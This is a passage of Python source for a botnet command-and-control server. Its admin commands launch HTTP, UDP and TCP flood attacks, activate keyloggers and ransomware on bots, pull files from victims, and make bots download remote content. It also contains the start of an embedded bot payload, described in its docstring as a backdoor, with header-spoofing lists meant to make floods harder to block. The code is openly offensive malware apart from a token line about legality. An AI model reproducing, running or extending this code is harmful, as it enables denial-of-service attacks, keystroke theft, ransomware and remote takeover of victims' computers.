
Here is the valid input: !unbanip <ip>", conn) elif msg.startswith("!getipbanlist"): self.send_to_other("SERVER",name,f"IP Ban List: {self.return_iplist("ban")}", conn) elif msg.startswith("!getipwhitelist"): self.send_to_other("SERVER",name,f"IP White List: {self.return_iplist("allow")}", conn) elif msg.startswith("!whitelistip"): try: whitelist_ip = msg.split()[1] if whitelist_ip in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is already in the whitelist!", conn) elif whitelist_ip in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is in the banlist!", conn) else: self.add_ip(whitelist_ip, "allow") self.send_to_other("SERVER",name,f"IP Address '{whitelist_ip}' has been whitelisted in the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !whitelistip <ip>", conn) elif msg.startswith("!unwhitelistip"): try: unwhitelist_ip = msg.split()[1] if unwhitelist_ip not in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is not in the whitelist!", conn) else: self.remove_ip(unwhitelist_ip,"allow") self.send_to_other("SERVER",name,f"IP Address '{unwhitelist_ip}' has been unwhitelisted from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !unwhitelistip <ip>", conn) elif msg.startswith("!togglelisten"): if self.listening == True: self.listening = False elif self.listening == False: self.listening = True self.log(f"[({datetime.datetime.today()})][(INFO)]: Listening for connections has been set to: {self.listening}") self.adminconn.send(f"\n[(SERVER)]: Listening for connections has been set to: {self.listening}".encode()) elif msg.startswith("!stopfocus"): if not self.focusing: self.send_to_other("SERVER",name,"You are not focusing on a bot right now!", conn) else: self.focusing = False self.focus_conn = None self.send_to_other("SERVER",name,f"Stopped focusing on bot {self.focus_botname}.", conn) self.focus_botname = "" elif msg.startswith("!getbotinfo"): if len(self.botinfo) == 0: self.send_to_other("SERVER",name, "There are no bots connected to the Botnet at the moment.", conn) for bot in self.botinfo: if "closed" in str(bot[5]): self.botinfo.remove(bot) else: self.send_to_other("SERVER",name,f"Info on Bot {bot[0]} - IP: {bot[1]} Src-Port: {bot[2]} User: {bot[3]} OS: {bot[4]} Conn: {bot[5]}", self.adminconn) elif msg.startswith("!filedownload"): try: filename = self.get_filename(msg) if self.downloading: self.send_to_other("SERVER",name,"You are already downloading a file from the bot computer!", conn) else: if self.focusing: self.botdownload = open(os.path.join(os.getcwd(),f"{self.ftp_dir}/{filename}"),"wb") self.downloading = True self.send_to_other(self.admin_username,self.focus_botname,msg, self.focus_conn, True) self.send_to_other("SERVER",name,f"Attempting to download file {filename} from {self.focus_botname}. You will not be able to send instructions to any of the bots until the download finishes!", conn) else: self.send_to_other("SERVER",name,"You need to be in focus mode to be able to download files from bots(there would be a lot of traffic going on in the server)!", conn) except: self.send_to_other("SERVER",name,"Invalid input! 
Here is the valid input: !filedownload <filename>", conn) else: if msg.startswith("!stopatk"): if self.ddosing: if not self.focusing: self.ddosing = False self.send_to_other("SERVER",self.admin_username,"Attempting to stop all DDoS Attacks in the botnet.",self.adminconn) else: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! Only the bot you are focusing will stop attacking!",self.adminconn) elif not self.ddosing: self.send_to_other("SERVER",self.admin_username,"The Bots are currently not attacking any domain.",self.adminconn) elif msg.startswith("!keylog"): self.send_to_other("SERVER",self.admin_username,"Activating Keylogger script on the bots(All of the logged keystrokes will be in a txt file with the bot's name).",self.adminconn) self.keylogging = True botnames = self.obtain_botname_list() for i in botnames: try: keylogfile = open(f"{i}.txt","r") except: keylogfile = open(f"{i}.txt","w") keylogfile.write(f"\nLOGGED KEYSTROKES FOR BOT {i}\n") keylogfile.close() elif msg.startswith("!stopkeylog"): self.keylogging = False self.send_to_other("SERVER",self.admin_username,"Deactivating Keylogger script on the bots.",self.adminconn) elif msg.startswith("!ransomware"): if self.ransomware_active: if self.focusing: self.send_to_other("SERVER",name,"Only the bot in focus mode has had the ransomware program activated!", conn) else: self.send_to_other("SERVER",name,"Ransomware programs are activating!", conn) self.send_to_other("SERVER",name,"Payloads are effective!", conn) else: self.send_to_other("SERVER",name,"The ransomware has been disabled in the config file. Turn the value assigned to 'ransomware_active' to 't'", conn) elif msg.startswith("!download"): try: filename = msg.split()[1] website = msg.split()[2] self.send_to_other("SERVER",self.admin_username,f"Making the bots download contents from '{website}' into file {filename}",self.adminconn) except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !download <filename> <website>", conn) elif msg.startswith('!httpflood'): if self.ddosing: self.send_to_other("SERVER",self.admin_username,"There is already an ongoing DDoS Attack! Please stop the attack if you want to start a new one(input '!stopatk').",self.adminconn) else: msgtobot = msg.split() if self.focusing: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! Only the bot you are focusing will start attacking!",self.adminconn) else: self.ddosing = True try: targ_website = msgtobot[1] atk_delay = float(msgtobot[2]) self.send_to_other("SERVER",self.admin_username,f"Beginning HTTP Flood Attack on {targ_website} with delay of {atk_delay}.",self.adminconn) except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !httpflood <website> <atk_delay>", conn) elif msg.startswith('!udpflood') or msg.startswith("!tcpflood"): if self.ddosing: self.send_to_other("SERVER",self.admin_username,"There is already an ongoing DDoS Attack! Please stop the attack if you want to start a new one(input '!stopatk').",self.adminconn) else: if self.focusing: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! 
Only the bot you are focusing will start attacking!",self.adminconn) else: self.ddosing = True if msg.startswith('!udpflood'): protocol = "UDP" elif msg.startswith("!tcpflood"): protocol = "TCP" msgtobot = msg.split() try: target = msgtobot[1] try: port = int(msgtobot[2]) except: port = 80 try: delay = float(msgtobot[3]) except: delay = 0 self.send_to_other("SERVER",self.admin_username,f"Beginning {protocol} Flood Attack on {target}:{port} with delay of {delay}.",self.adminconn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !{protocol.lower()}flood <ip> <port> <delay>", conn) if not self.focusing and not self.downloading: if msg.strip() != "": self.log(f"[({datetime.datetime.today()})][({self.admin_username})--->(BOTS)]: {msg}") display_single_msg = False for bot in self.connlist: try: if conn != bot: if msg.startswith("!ransomware") and not self.ransomware_active: pass else: bot.send(msg.encode()) except: pass else: if not self.downloading: if msg.strip() != "": display_single_msg = False self.log(f"[({datetime.datetime.today()})][({self.admin_username})--->({self.focus_botname})]: {msg}") self.focus_conn.send(msg.encode()) elif self.filetransfer: if msg.startswith("!help"): self.adminconn.send(self.file_tranfer_help_msg().encode()) self.log(f"[({datetime.datetime.today()})][(SERVER)--->({self.admin_username})]: Sent the FTP Help message.") elif msg.startswith("!download"): try: filename = self.get_filename(msg) file = open(os.path.join(os.getcwd(),f"{self.ftp_dir}/{filename}"),"rb") file.close() self.send_to_other("SERVER",name, f"Preparing to download file: {file.name}.", conn) self.send_file(file.name, conn) except FileNotFoundError: self.send_to_other("SERVER",name,f"The file specified does not exist!", conn) except Exception as e: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !download <file>", conn) elif msg.startswith("!listdir"): dirlist = os.listdir(path=os.path.join(os.getcwd(), self.ftp_dir)) self.send_to_other("SERVER",name,f"Files extracted from bots: {dirlist}",conn) elif msg.startswith("!stopftp"): self.send_to_other("SERVER",name,"De-Activating FTP Mode. Returning to the Botnet. You will be able to send commands to the bots.",conn) self.filetransfer = False if display_single_msg: if not msg.startswith("!login"): if not msg.startswith("!key") and msg.strip() != "": self.log(f"[({datetime.datetime.today()})][({name})]: {msg}") if conn != self.adminconn: self.adminconn.send(f"\n[({name})]: {msg}".encode()) else: self.log(f"[({datetime.datetime.today()})][({name})]: Attempting to log into the Admin Account.") except Exception as e: if registered: self.log(f"[({datetime.datetime.today()})][(ERROR)]: Closing connection with {name} due to error: {e}") if conn == self.adminconn: self.log(f"[({datetime.datetime.today()})][(INFO)]: The admin has left the Botnet.") self.adminconn = None self.admin_online = False else: try: if registered: self.adminconn.send(f"[(SERVER)]: {name} has disconnected from the Botnet.".encode()) except: pass if conn == self.focus_conn: self.send_to_other("SERVER",self.admin_username,f"The Bot you were focusing on has disconnected from the Botnet, going back to normal.", self.adminconn) self.focusing = False self.focus_conn = None self.focus_botname = "" self.downloading = False try: self.connlist.remove(conn) except: pass conn.close() break def gen_payload(self): """The Payload script is located here. It is generated based on the server variables in the '__init__' function. 
This is what the bots use to connect to the server. This script is really a backdoor, which opens the victim to having their computer controlled remotely by the admin. There are a lot of referer and useragent tags, and the reason for that is the DDoS Function. If the user, for whatever reason wants to commit a large scale DDoS Attack, they need to have uniqueness with the HTTP Headers, so that it could help confuse the server they are attacking, and eventually bring it down(Servers are really secure nowadays and DDoSing is illegal, so only DDoS Your own servers please). There is also all of the code needed for controlling the bot. The functions are divided into different classes, with the 3 types of DDoS Functions divided into different classes, with the main bot code in one separate class itself.""" payload = """ import socket, threading, os, sys, urllib.request, random, time, shutil, subprocess, sqlite3 try: from cryptography.fernet import Fernet from pynput.keyboard import Listener except: pass class DDoS: def __init__(self, ip, delay): self.ip = ip self.delay = delay self.stopatk = False self.useragents = self.obtain_user_agents() self.referers = self.obtain_referers() self.threader = threading.Thread(target=self.start_thr) self.threader.start() def obtain_referers(self): referers = ['http://www.google.com/?q=', 'http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..', 'http://vk.com/profile.php?redirect=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=query?=query=..', 'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882', 'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925', 'http://yandex.ru/yandsearch?text=', 'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832', 'http://go.mail.ru/search?mail.ru=1&q=', 'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..', 'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..', 'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..', 'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..', 'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..', '/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882', 'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..', 'http://www.google.ru/url?sa=t&rct=?j&q=&e..', 'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=', 'https://www.yandex.com/yandsearch?text=', 'https://duckduckgo.com/?q=', 'http://www.ask.com/web?q=', 'http://search.aol.com/aol/search?q=', 'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=', 
'https://drive.google.com/viewerng/viewer?url=', 'http://validator.w3.org/feed/check.cgi?url=', 'http://host-tracker.com/check_page/?furl=', 'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=', 'http://jigsaw.w3.org/css-validator/validator?uri=', 'https://add.my.yahoo.com/rss?url=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 
            'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
            'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
            'http://www.google.com/translate?u=',
            'https://developers.google.com/speed/pagespeed/insights/?url=',
            'http://help.baidu.com/searchResult?keywords=',
            'http://www.bing.com/search?q=',
        ]
        return referers

    def obtain_user_agents(self):
        """Return a pool of desktop, mobile, console, and crawler User-Agent strings."""
        user_agents = [
            'Mozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14',
            'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15',
            'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14',
            'Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4',
            'Mozilla/5.0 (BeOS; U; BeOS BeBox; fr; rv:1.9) Gecko/2008052906 BonEcho/2.0',
            'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.1) Gecko/20061220 BonEcho/2.0.0.1',
            'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.10) Gecko/20071128 BonEcho/2.0.0.10',
            'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17',
            'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.6) Gecko/20070731 BonEcho/2.0.0.6',
            'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7',
            'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
            'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
            'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
            'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
            'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
            'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
            'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
            'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
            'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
            'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
            'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
            'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
            'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
            'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
            'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
            'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
            'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
            'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
            'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
            'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
            'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
            'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
            'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
            'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
            'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
            'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
            'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
            'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
            'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
            'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
            'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
            'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
            'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
            'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
            'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
            'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
            'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
            'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
            'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
            'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
            'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
            'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
            'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
            'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
            'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
            'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
            'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
            'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
            'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
            'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
            'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
            'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
            'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
            'Mozilla/4.0 (compatible; Arachmo)',
            'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
            'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
            'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
            'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
            'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
            'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
            'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
            'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
            'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
            'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
            'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
            'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
            'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
            'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
            'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
            'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
            'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
            'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
            'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
            'Mozilla/5.0 (PLAYSTATION 3; 3.55)',
            'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
            'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
            'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
            'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
            'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
            'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
            'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
            'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
